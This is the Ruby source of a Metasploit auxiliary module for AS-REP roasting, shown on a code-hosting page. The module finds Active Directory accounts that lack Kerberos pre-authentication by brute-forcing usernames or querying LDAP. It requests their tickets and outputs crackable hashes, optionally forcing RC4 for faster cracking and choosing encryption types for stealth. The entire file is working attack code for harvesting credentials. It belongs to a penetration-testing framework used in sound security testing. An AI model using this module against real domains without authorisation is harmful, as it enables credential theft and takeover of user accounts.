Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/gather/asrep.rb
19758 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::Kerberos::Client

8
  include Msf::Exploit::Remote::LDAP

9
  include Msf::Exploit::Remote::LDAP::Queries

10
  include Msf::OptionalSession::LDAP

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Find Users Without Pre-Auth Required (ASREP-roast)',

17
        'Description' => %q{

18
          This module searches for AD users without pre-auth required. Two different approaches

19
          are provided:

20
          - Brute force of usernames (does not require a user account; should not lock out accounts)

21
          - LDAP lookup (requires an AD user account)

22
        },

23
        'License' => MSF_LICENSE,

24
        'Author' => [

25
          'smashery', # MSF Module

26
        ],

27
        'References' => [

28
          ['URL', 'https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat']

29
        ],

30
        'Notes' => {

31
          'Stability' => [CRASH_SAFE],

32
          'SideEffects' => [IOC_IN_LOGS],

33
          'Reliability' => [],

34
          'AKA' => ['preauth', 'asreproast']

35
        },

36
        'Actions' => [

37
          ['BRUTE_FORCE', { 'Description' => 'Brute force to find susceptible user accounts' } ],

38
          ['LDAP', { 'Description' => 'Ask a domain controller directly for the susceptible user accounts' } ],

39
        ],

40
        'DefaultAction' => 'BRUTE_FORCE'

41
      )

42
    )

43


44
    register_options(

45
      [

46
        Opt::RHOSTS(nil, true, 'The target KDC, see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html'),

47
        OptPath.new('USER_FILE', [ false, 'File containing usernames, one per line' ], conditions: %w[ACTION == BRUTE_FORCE]),

48
        OptBool.new('USE_RC4_HMAC', [ true, 'Request using RC4 hash instead of default encryption types (faster to crack)', true]),

49
        OptString.new('Rhostname', [ false, "The domain controller's hostname"], aliases: ['LDAP::Rhostname']),

50
      ]

51
    )

52
    register_option_group(name: 'SESSION',

53
                          description: 'Used when connecting to LDAP over an existing SESSION',

54
                          option_names: %w[RHOSTS],

55
                          required_options: %w[SESSION RHOSTS])

56
    register_advanced_options(

57
      [

58
        OptEnum.new('LDAP::Auth', [true, 'The Authentication mechanism to use', Msf::Exploit::Remote::AuthOption::NTLM, Msf::Exploit::Remote::AuthOption::LDAP_OPTIONS]),

59
      ]

60
    )

61
  end

62


63
  def run

64
    case action.name

65
    when 'BRUTE_FORCE'

66
      run_brute

67
    when 'LDAP'

68
      run_ldap

69
    end

70
  rescue Errno::ECONNRESET

71
    fail_with(Failure::Disconnected, 'The connection was reset.')

72
  rescue Rex::ConnectionError => e

73
    fail_with(Failure::Unreachable, e.message)

74
  rescue Rex::Proto::Kerberos::Model::Error::KerberosError => e

75
    fail_with(Failure::NoAccess, e.message)

76
  rescue Net::LDAP::Error => e

77
    fail_with(Failure::Unknown, "#{e.class}: #{e.message}")

78
  end

79


80
  def run_brute

81
    result_count = 0

82
    user_file = datastore['USER_FILE']

83
    username = datastore['LDAPUsername']

84
    if user_file.blank? && username.blank?

85
      fail_with(Msf::Module::Failure::BadConfig, 'User file or username must be specified when brute forcing')

86
    end

87
    if username.present?

88
      begin

89
        roast(datastore['LDAPUsername'])

90
        result_count += 1

91
      rescue ::Rex::Proto::Kerberos::Model::Error::KerberosError => e

92
        # User either not present, or requires preauth

93
        vprint_status("User: #{username} - #{e}")

94
      end

95
    end

96
    if user_file.present?

97
      File.open(user_file, 'rb') do |file|

98
        file.each_line(chomp: true) do |user_from_file|

99
          roast(user_from_file)

100
          result_count += 1

101
        rescue ::Rex::Proto::Kerberos::Model::Error::KerberosError => e

102
          # User either not present, or requires preauth

103
          vprint_status("User: #{user_from_file} - #{e}")

104
        end

105
      end

106
    end

107


108
    if result_count == 0

109
      print_error('No users found without preauth required')

110
    else

111
      print_line

112
      print_status("Query returned #{result_count} #{'result'.pluralize(result_count)}.")

113
    end

114
  end

115


116
  def run_ldap

117
    run_builtin_ldap_query('ENUM_USER_ASREP_ROASTABLE') do |result|

118
      username = result.samaccountname[0]

119
      begin

120
        roast(username)

121
      rescue ::Rex::Proto::Kerberos::Model::Error::KerberosError => e

122
        print_error("#{username} reported as ASREP-roastable, but received error when attempting to retrieve TGT (#{e})")

123
      end

124
    end

125
  end

126


127
  def roast(username)

128
    res = send_request_tgt(

129
      server_name: "krbtgt/#{datastore['domain']}",

130
      client_name: username,

131
      realm: datastore['LDAPDomain'],

132
      offered_etypes: etypes,

133
      rport: 88,

134
      rhost: datastore['RHOST']

135
    )

136
    hash = format_as_rep_to_john_hash(res.as_rep)

137
    print_line(hash)

138
    jtr_format = Metasploit::Framework::Hashes.identify_hash(hash)

139
    report_hash(hash, jtr_format)

140
  end

141


142
  def report_hash(hash, jtr_format)

143
    service_data = {

144
      address: rhost,

145
      port: rport,

146
      service_name: 'Kerberos',

147
      protocol: 'tcp',

148
      workspace_id: myworkspace_id

149
    }

150
    credential_data = {

151
      module_fullname: fullname,

152
      origin_type: :service,

153
      private_data: hash,

154
      private_type: :nonreplayable_hash,

155
      jtr_format: jtr_format

156
    }.merge(service_data)

157


158
    credential_core = create_credential(credential_data)

159


160
    login_data = {

161
      core: credential_core,

162
      status: Metasploit::Model::Login::Status::UNTRIED

163
    }.merge(service_data)

164


165
    create_credential_login(login_data)

166
  end

167


168
  def etypes

169
    if datastore['USE_RC4_HMAC']

170
      [Rex::Proto::Kerberos::Crypto::Encryption::RC4_HMAC]

171
    else

172
      # We could just ask for AES256, but we have an opportunity to be stealthier by asking for a normal set of etypes,

173
      # and expecting to receive AES256. This assumption may be broken in the future if additional encryption types are added

174
      Rex::Proto::Kerberos::Crypto::Encryption::DefaultOfferedEtypes

175
    end

176
  end

177


178
  attr_accessor :ldap_query # The LDAP query for this module, loaded from a yaml file

179


180
end

181


182